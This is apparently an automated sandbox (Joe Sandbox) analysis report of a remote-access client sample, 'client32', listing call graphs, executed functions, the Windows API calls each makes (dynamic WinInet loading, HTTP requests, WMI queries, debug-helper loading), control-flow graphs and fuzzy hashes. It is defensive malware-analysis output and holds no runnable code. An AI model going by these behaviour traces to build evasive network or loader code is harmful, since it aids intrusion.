27377->27419 27379->27360 27380->27376 27420 11029a70 262 API calls 27380->27420 27460 11061710 290 API calls 27383->27460 27385 11061ade 27386 111101b0 262 API calls 27385->27386 27387 11061b0b 27386->27387 27388 11061b24 27387->27388 27461 11061710 290 API calls 27387->27461 27390 111101b0 262 API calls 27388->27390 27391 11061b35 27390->27391 27394 11061b4e 27391->27394 27462 11061710 290 API calls 27391->27462 27393 11061ba2 27393->27363 27394->27393 27395 11142e60 262 API calls 27394->27395 27396 11061b76 27395->27396 27463 11061a70 27396->27463 27399 11061a70 270 API calls 27400 11061b94 27399->27400 27401 11061a70 270 API calls 27400->27401 27401->27393 27402->27366 27403->27368 27404->27370 27406 110d16dc 27405->27406 27407 110d16f7 27406->27407 27408 110d16e0 27406->27408 27421 110d03e0 27407->27421 27450 11029a70 262 API calls 27408->27450 27415 110d172e 27415->27376 27415->27377 27416 110d1717 27451 11029a70 262 API calls 27416->27451 27422 110d03e9 27421->27422 27423 110d03ed 27422->27423 27424 110d0404 27422->27424 27452 11029a70 262 API calls 27423->27452 27426 110d0401 27424->27426 27427 110d0438 27424->27427 27426->27424 27453 11029a70 262 API calls 27426->27453 27429 110d0435 27427->27429 27430 110d0456 27427->27430 27429->27427 27454 11029a70 262 API calls 27429->27454 27433 110d12e0 27430->27433 27434 110d12ee 27433->27434 27435 110d12f2 27434->27435 27437 110d1309 27434->27437 27455 11029a70 262 API calls 27435->27455 27439 110d133c 27437->27439 27440 110d1306 27437->27440 27438 110d13b0 27438->27415 27438->27416 27439->27438 27457 110d0c30 262 API calls 27439->27457 27440->27437 27456 11029a70 262 API calls 27440->27456 27442 110d1363 27446 110d136f 27442->27446 27458 110d0b70 265 API calls 27442->27458 27446->27438 27447 110d1399 27446->27447 27459 11029a70 262 API calls 27447->27459 27457->27442 27458->27446 27460->27385 27461->27388 27462->27394 27466 11061970 27463->27466 27477 11061290 27466->27477 27470 11061a08 27524 11061170 69 API calls 27470->27524 27472 110619cc 27472->27470 27476 11061320 270 API calls 27472->27476 27473 11061a1a 27474 11162bb7 5 API calls 27473->27474 27475 11061a32 27474->27475 27475->27399 27476->27472 27478 111101b0 262 API calls 27477->27478 27479 110612ac 27478->27479 27480 110612f5 27479->27480 27481 110612b3 27479->27481 27532 1116305a 66 API calls 27480->27532 27525 1105ee10 27481->27525 27484 110612eb 27488 11061320 27484->27488 27485 11061304 27533 111634b1 RaiseException 27485->27533 27487 11061319 27489 11061635 27488->27489 27490 11061355 27488->27490 27489->27472 27492 110614b4 27490->27492 27494 11061401 RegEnumValueA 27490->27494 27495 11061389 RegQueryInfoKeyA 27490->27495 27491 1105ee10 68 API calls 27491->27489 27493 11061624 27492->27493 27521 11061542 27492->27521 27534 110611e0 27492->27534 27493->27491 27497 1106149c 27494->27497 27508 11061435 27494->27508 27498 110613c2 27495->27498 27499 110613ae 27495->27499 27502 11163aa5 66 API calls 27497->27502 27503 110613e2 27498->27503 27541 11029a70 262 API calls 27498->27541 27540 11029a70 262 API calls 27499->27540 27504 110614a9 27502->27504 27506 11163a11 66 API calls 27503->27506 27504->27492 27511 110613f0 27506->27511 27507 1106146e RegEnumValueA 27507->27497 27507->27508 27508->27507 27522 11061649 27508->27522 27542 11081d30 27508->27542 27546 11081e70 86 API calls 27508->27546 27510 110615a0 27510->27521 27550 11029a70 262 API calls 27510->27550 27511->27494 27516 1106151f 27548 1105ef20 262 API calls 27516->27548 27518 11081d30 IsDBCSLeadByte 27518->27521 27519 11061532 27549 1105fdc0 85 API calls 27519->27549 27521->27493 27521->27510 27521->27518 27521->27522 27551 11146a90 27521->27551 27554 11081e70 86 API calls 27521->27554 27522->27472 27524->27473 27526 1105ee21 LeaveCriticalSection 27525->27526 27527 1105ee2b 27525->27527 27526->27527 27528 11163aa5 66 API calls 27527->27528 27531 1105ee3f 27527->27531 27528->27531 27529 1105ee85 27529->27484 27530 1105ee49 EnterCriticalSection 27530->27484 27531->27529 27531->27530 27532->27485 27533->27487 27535 110611ee 27534->27535 27536 11061208 27534->27536 27555 110608e0 27535->27555 27536->27521 27547 11145bc0 264 API calls 27536->27547 27538 11061200 27563 110610f0 27538->27563 27543 11081d3c 27542->27543 27545 11081d41 27542->27545 27599 11081c50 IsDBCSLeadByte 27543->27599 27545->27508 27546->27508 27547->27516 27548->27519 27549->27521 27600 11145be0 27551->27600 27554->27521 27556 110608f4 27555->27556 27562 1106092c 27555->27562 27557 110608f8 27556->27557 27556->27562 27566 110606d0 66 API calls 27557->27566 27558 11060992 27558->27538 27560 11060903 27560->27538 27562->27558 27567 11060470 67 API calls 27562->27567 27568 110609a0 27563->27568 27566->27560 27567->27562 27569 11060a24 27568->27569 27570 110609df 27568->27570 27569->27536 27576 11060820 27570->27576 27573 110609a0 263 API calls 27574 11060a16 27573->27574 27575 110609a0 263 API calls 27574->27575 27575->27569 27577 111101b0 262 API calls 27576->27577 27578 11060854 27577->27578 27579 11060862 27578->27579 27580 110608b9 27578->27580 27587 11060100 27579->27587 27591 1116305a 66 API calls 27580->27591 27584 110608c8 27592 111634b1 RaiseException 27584->27592 27586 110608dd 27588 11060134 27587->27588 27589 11060141 27587->27589 27593 1105f7c0 27588->27593 27589->27573 27591->27584 27592->27586 27594 1105f7d2 27593->27594 27594->27594 27595 11110230 262 API calls 27594->27595 27596 1105f7e2 27595->27596 27596->27596 27597 11163a11 66 API calls 27596->27597 27598 1105f80b 27597->27598 27598->27589 27599->27545 27601 11145bf0 27600->27601 27601->27601 27602 11110230 262 API calls 27601->27602 27603 11145c02 27602->27603 27606 11145b10 27603->27606 27605 11145c10 27605->27521 27607 11145b27 27606->27607 27610 11145b62 27606->27610 27607->27607 27608 11162bb7 5 API calls 27607->27608 27609 11145b5e 27608->27609 27609->27605 27615 11143340 WideCharToMultiByte GetLastError 27610->27615 27612 11145ba6 27613 11162bb7 5 API calls 27612->27613 27614 11145bb9 27613->27614 27614->27605 27615->27612 28322 1100c0f0 353 API calls 28324 110034f0 GetSystemMetrics GetSystemMetrics 28497 11014af0 264 API calls 28326 11124ce0 72 API calls 28499 111242e0 87 API calls 28327 11018cf8 21 API calls 28328 110140fd 267 API calls

                                                                                                                                    Executed Functions

                                                                                                                                    Function 11029BB0 Relevance: 82.8, APIs: 35, Strings: 12, Instructions: 534libraryloadernetworkCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 0 11029bb0-11029c3e LoadLibraryA 1 11029c41-11029c46 0->1 2 11029c48-11029c4b 1->2 3 11029c4d-11029c50 1->3 4 11029c65-11029c6a 2->4 5 11029c52-11029c55 3->5 6 11029c57-11029c62 3->6 7 11029c99-11029ca5 4->7 8 11029c6c-11029c71 4->8 5->4 6->4 11 11029d4a-11029d4d 7->11 12 11029cab-11029cc3 call 11163a11 7->12 9 11029c73-11029c8a GetProcAddress 8->9 10 11029c8c-11029c8f 8->10 9->10 15 11029c91-11029c93 SetLastError 9->15 10->7 13 11029d68-11029d80 InternetOpenA 11->13 14 11029d4f-11029d66 GetProcAddress 11->14 22 11029ce4-11029cf0 12->22 23 11029cc5-11029cde GetProcAddress 12->23 18 11029da4-11029db0 call 11163aa5 13->18 14->13 17 11029d99-11029da1 SetLastError 14->17 15->7 17->18 28 11029db6-11029de7 call 11142e60 call 11165250 18->28 29 1102a02a-1102a034 18->29 27 11029cf2-11029cfb GetLastError 22->27 30 11029d11-11029d13 22->30 23->22 24 11029d82-11029d8a SetLastError 23->24 24->27 27->30 31 11029cfd-11029d0f call 11163aa5 call 11163a11 27->31 55 11029de9-11029dec 28->55 56 11029def-11029e04 call 11081d30 * 2 28->56 29->1 33 1102a03a 29->33 35 11029d30-11029d3c 30->35 36 11029d15-11029d2e GetProcAddress 30->36 31->30 38 1102a04c-1102a04f 33->38 35->11 57 11029d3e-11029d47 35->57 36->35 40 11029d8f-11029d97 SetLastError 36->40 42 1102a051-1102a056 38->42 43 1102a05b-1102a05e 38->43 40->11 49 1102a1bf-1102a1c7 42->49 44 1102a060-1102a065 43->44 45 1102a06a 43->45 50 1102a18f-1102a194 44->50 51 1102a06d-1102a075 45->51 53 1102a1d0-1102a1e3 49->53 54 1102a1c9-1102a1ca FreeLibrary 49->54 60 1102a196-1102a1ad GetProcAddress 50->60 61 1102a1af-1102a1b5 50->61 58 1102a077-1102a08e GetProcAddress 51->58 59 1102a094-1102a0a2 InternetQueryDataAvailable 51->59 54->53 55->56 76 11029e06-11029e0a 56->76 77 11029e0d-11029e19 56->77 57->11 58->59 64 1102a14e-1102a150 SetLastError 58->64 65 1102a156-1102a15d 59->65 66 1102a0a8-1102a0ad 59->66 60->61 67 1102a1b7-1102a1b9 SetLastError 60->67 61->49 64->65 70 1102a16c-1102a18d call 11027f00 * 2 65->70 69 1102a0b3-1102a0ef call 11110230 call 11027eb0 66->69 66->70 67->49 90 1102a101-1102a103 69->90 91 1102a0f1-1102a0f4 69->91 70->50 76->77 80 11029e44-11029e49 77->80 81 11029e1b-11029e1d 77->81 87 11029e4b-11029e5c GetProcAddress 80->87 88 11029e5e-11029e75 InternetConnectA 80->88 84 11029e34-11029e3a 81->84 85 11029e1f-11029e32 GetProcAddress 81->85 84->80 85->84 89 11029e3c-11029e3e SetLastError 85->89 87->88 92 11029ea1-11029eac SetLastError 87->92 93 1102a017-1102a027 call 11162777 88->93 94 11029e7b-11029e7e 88->94 89->80 98 1102a105 90->98 99 1102a10c-1102a111 90->99 91->90 97 1102a0f6-1102a0fa 91->97 92->93 93->29 100 11029e80-11029e82 94->100 101 11029eb9-11029ec1 94->101 97->90 109 1102a0fc 97->109 98->99 104 1102a113-1102a129 call 110d12e0 99->104 105 1102a12c-1102a12e 99->105 102 11029e84-11029e97 GetProcAddress 100->102 103 11029e99-11029e9f 100->103 107 11029ec3-11029ed7 GetProcAddress 101->107 108 11029ed9-11029ef4 101->108 102->103 110 11029eb1-11029eb3 SetLastError 102->110 103->101 104->105 112 1102a130-1102a132 105->112 113 1102a134-1102a145 call 11162777 105->113 107->108 114 11029ef6-11029efe SetLastError 107->114 120 11029f01-11029f04 108->120 109->90 110->101 112->113 117 1102a15f-1102a169 call 11162777 112->117 113->70 126 1102a147-1102a149 113->126 114->120 117->70 123 1102a012-1102a015 120->123 124 11029f0a-11029f0f 120->124 123->93 125 1102a03c-1102a049 call 11162777 123->125 128 11029f11-11029f28 GetProcAddress 124->128 129 11029f2a-11029f36 124->129 125->38 126->51 128->129 131 11029f38-11029f40 SetLastError 128->131 133 11029f42-11029f5b GetLastError 129->133 131->133 135 11029f76-11029f8b 133->135 136 11029f5d-11029f74 GetProcAddress 133->136 139 11029f95-11029fa3 GetLastError 135->139 136->135 137 11029f8d-11029f8f SetLastError 136->137 137->139 140 11029fa5-11029faa 139->140 141 11029fac-11029fb8 GetDesktopWindow 139->141 140->141 142 1102a002-1102a007 140->142 143 11029fd3-11029fef 141->143 144 11029fba-11029fd1 GetProcAddress 141->144 142->123 145 1102a009-1102a00f 142->145 143->123 148 11029ff1 143->148 144->143 146 11029ff6-1102a000 SetLastError 144->146 145->123 146->123 148->120
                                                                                                                                    APIs
                                                                                                                                    • LoadLibraryA.KERNEL32(WinInet.dll,20F29797,766DEA30,?,00000000), ref: 11029BE5
                                                                                                                                    • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 11029C7F
                                                                                                                                    • SetLastError.KERNEL32(00000078), ref: 11029C93
                                                                                                                                    • GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 11029CD1
                                                                                                                                    • GetLastError.KERNEL32 ref: 11029CF2
                                                                                                                                    • GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 11029D21
                                                                                                                                    • GetProcAddress.KERNEL32(?,InternetOpenA), ref: 11029D5B
                                                                                                                                    • InternetOpenA.WININET(11195264,?,?,000000FF,00000000), ref: 11029D7A
                                                                                                                                    • SetLastError.KERNEL32(00000078), ref: 11029D84
                                                                                                                                    • SetLastError.KERNEL32(00000078), ref: 11029D91
                                                                                                                                    • SetLastError.KERNEL32(00000078), ref: 11029D9B
                                                                                                                                      • Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ABB
                                                                                                                                      • Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD
                                                                                                                                    • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 11029E25
                                                                                                                                    • SetLastError.KERNEL32(00000078), ref: 11029E3E
                                                                                                                                    • GetProcAddress.KERNEL32(?,InternetConnectA), ref: 11029E51
                                                                                                                                    • InternetConnectA.WININET(000000FF,1119A6C0,00000050,00000000,00000000,00000003,00000000,00000000), ref: 11029E6E
                                                                                                                                    • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 11029E8A
                                                                                                                                    • SetLastError.KERNEL32(00000078), ref: 11029EA3
                                                                                                                                    • GetProcAddress.KERNEL32(?,HttpOpenRequestA), ref: 11029EC9
                                                                                                                                    • GetProcAddress.KERNEL32(?,HttpSendRequestA), ref: 11029F1D
                                                                                                                                    • GetProcAddress.KERNEL32(?,InternetQueryDataAvailable), ref: 1102A083
                                                                                                                                    • InternetQueryDataAvailable.WININET(1117FC4B,1102CCC1,00000000,00000000), ref: 1102A09E
                                                                                                                                    • SetLastError.KERNEL32(00000078), ref: 1102A150
                                                                                                                                    • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 1102A1A2
                                                                                                                                    • SetLastError.KERNEL32(00000078), ref: 1102A1B9
                                                                                                                                    • FreeLibrary.KERNEL32(?), ref: 1102A1CA
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AddressProc$ErrorLast$Internet$FreeLibrary$AvailableConnectDataHeapLoadOpenQuery
                                                                                                                                    • String ID: ://$GET$HttpOpenRequestA$HttpQueryInfoA$HttpSendRequestA$InternetCloseHandle$InternetConnectA$InternetErrorDlg$InternetOpenA$InternetQueryDataAvailable$InternetQueryOptionA$WinInet.dll
                                                                                                                                    • API String ID: 3880851012-913974648
                                                                                                                                    • Opcode ID: f03014e0bf55a1910d51b16b946de05d788c060526a3268da345a20076476512
                                                                                                                                    • Instruction ID: fedf281c9ee5d08c3a8f43e513d3e5c088d5a5ed6dab1fd82504b865b87691ba
                                                                                                                                    • Opcode Fuzzy Hash: f03014e0bf55a1910d51b16b946de05d788c060526a3268da345a20076476512
                                                                                                                                    • Instruction Fuzzy Hash: 8012AC70D40229DBEB11DFE5CC88AAEFBF8FF88754F604169E425A7600EB745980CB60
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 11144140 Relevance: 66.6, APIs: 20, Strings: 18, Instructions: 134libraryloaderCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    APIs
                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,8504C483,766DEA30), ref: 11144173
                                                                                                                                    • LoadLibraryA.KERNEL32(?), ref: 111441BC
                                                                                                                                    • LoadLibraryA.KERNEL32(DBGHELP.DLL), ref: 111441D5
                                                                                                                                    • LoadLibraryA.KERNEL32(IMAGEHLP.DLL), ref: 111441E4
                                                                                                                                    • GetModuleHandleA.KERNEL32(?), ref: 111441EA
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SymGetLineFromAddr), ref: 111441FE
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SymGetLineFromName), ref: 1114421D
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SymGetLineNext), ref: 11144228
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SymGetLinePrev), ref: 11144233
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SymMatchFileName), ref: 1114423E
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,StackWalk), ref: 11144249
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SymCleanup), ref: 11144254
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SymLoadModule), ref: 1114425F
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SymInitialize), ref: 1114426A
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SymGetOptions), ref: 11144275
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SymSetOptions), ref: 11144280
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SymGetModuleInfo), ref: 1114428B
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SymGetSymFromAddr), ref: 11144296
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SymFunctionTableAccess), ref: 111442A1
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,MiniDumpWriteDump), ref: 111442AC
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AddressProc$LibraryLoad$Module$FileHandleName
                                                                                                                                    • String ID: DBGHELP.DLL$IMAGEHLP.DLL$MiniDumpWriteDump$StackWalk$SymCleanup$SymFunctionTableAccess$SymGetLineFromAddr$SymGetLineFromName$SymGetLineNext$SymGetLinePrev$SymGetModuleInfo$SymGetOptions$SymGetSymFromAddr$SymInitialize$SymLoadModule$SymMatchFileName$SymSetOptions$dbghelp.dll
                                                                                                                                    • API String ID: 1621119295-2061581830
                                                                                                                                    • Opcode ID: 57b4066cb2a569ca058a5d5f8073bc193ef12f36e95607c0665d50404da9b0c4
                                                                                                                                    • Instruction ID: c7cebb5ad097969c59afa36c8b157edb2e0deacaa1fcee2d42955e2ce7c14d1b
                                                                                                                                    • Opcode Fuzzy Hash: 57b4066cb2a569ca058a5d5f8073bc193ef12f36e95607c0665d50404da9b0c4
                                                                                                                                    • Instruction Fuzzy Hash: 74416174A40704AFDB289F769D84E6BFBF8FF55B18B50492EE445D3A00EB74E8008B59
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1115C8E0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 183commemoryCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 864 1115c8e0-1115c94f CoInitializeSecurity CoCreateInstance 865 1115c955-1115c99d wsprintfW SysAllocString 864->865 866 1115cad4-1115cadc 864->866 871 1115cac1-1115cace SysFreeString 865->871 872 1115c9a3-1115c9c9 865->872 867 1115cae6-1115cb03 call 11162bb7 866->867 868 1115cade-1115cae1 866->868 868->867 871->866 872->871 875 1115c9cf-1115c9ea 872->875 877 1115c9f0-1115ca01 875->877 878 1115cab3-1115cabc 875->878 879 1115ca04-1115ca0d 877->879 878->871 879->879 880 1115ca0f-1115ca18 879->880 881 1115ca2c-1115ca5f call 110978f0 * 2 880->881 882 1115ca1a-1115ca29 wsprintfW 880->882 887 1115ca65 881->887 888 1115ca61-1115ca63 881->888 882->881 889 1115ca67-1115ca6b 887->889 888->889 890 1115ca71 889->890 891 1115ca6d-1115ca6f 889->891 892 1115ca73-1115ca87 890->892 891->892 893 1115ca8a-1115caab call 110979a0 * 2 892->893 893->878 898 1115caad 893->898 898->878
                                                                                                                                    APIs
                                                                                                                                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,20F29797,00000000,?), ref: 1115C927
                                                                                                                                    • CoCreateInstance.OLE32(111C627C,00000000,00000017,111C61AC,?), ref: 1115C947
                                                                                                                                    • wsprintfW.USER32 ref: 1115C967
                                                                                                                                    • SysAllocString.OLEAUT32(?), ref: 1115C973
                                                                                                                                    • wsprintfW.USER32 ref: 1115CA27
                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 1115CAC8
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Stringwsprintf$AllocCreateFreeInitializeInstanceSecurity
                                                                                                                                    • String ID: SELECT * FROM %s$WQL$root\CIMV2
                                                                                                                                    • API String ID: 3050498177-823534439
                                                                                                                                    • Opcode ID: 175defb0ff3311be352c3e895ec4c40801578b620f8bdfb43f719b83b34ddfee
                                                                                                                                    • Instruction ID: 91bf14772fb0e49150e0dc85e0cb347219a857647afd576183cc1e94570c565b
                                                                                                                                    • Opcode Fuzzy Hash: 175defb0ff3311be352c3e895ec4c40801578b620f8bdfb43f719b83b34ddfee
                                                                                                                                    • Instruction Fuzzy Hash: 04518071B40619AFC764CF69CC94F9AFBB8EB8A714F0046A9E429D7640DA30AE41CF51
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 11031780 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 31COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(1102EA50,?,00000000), ref: 110317A4
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                                                                    • String ID: Client32$NSMWClass$NSMWClass
                                                                                                                                    • API String ID: 3192549508-611217420
                                                                                                                                    • Opcode ID: c961f33892060384102c2ee032c69d83171ddabd259de90cbdfd1f05e760a560
                                                                                                                                    • Instruction ID: 804cb5d527221f69a992b866d17bc63a828f9d1c02720c4f1a032ef46c9a5584
                                                                                                                                    • Opcode Fuzzy Hash: c961f33892060384102c2ee032c69d83171ddabd259de90cbdfd1f05e760a560
                                                                                                                                    • Instruction Fuzzy Hash: C1F04F7890222ADFC30ADF95C995A59B7F4BB8870CB108574D43547208EB3179048B99
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 11174B29 Relevance: 1.5, APIs: 1, Instructions: 37COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • EnumSystemLocalesA.KERNEL32(11174898,00000001,11174C6D,00000001,00000000,00000000), ref: 11174B70
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
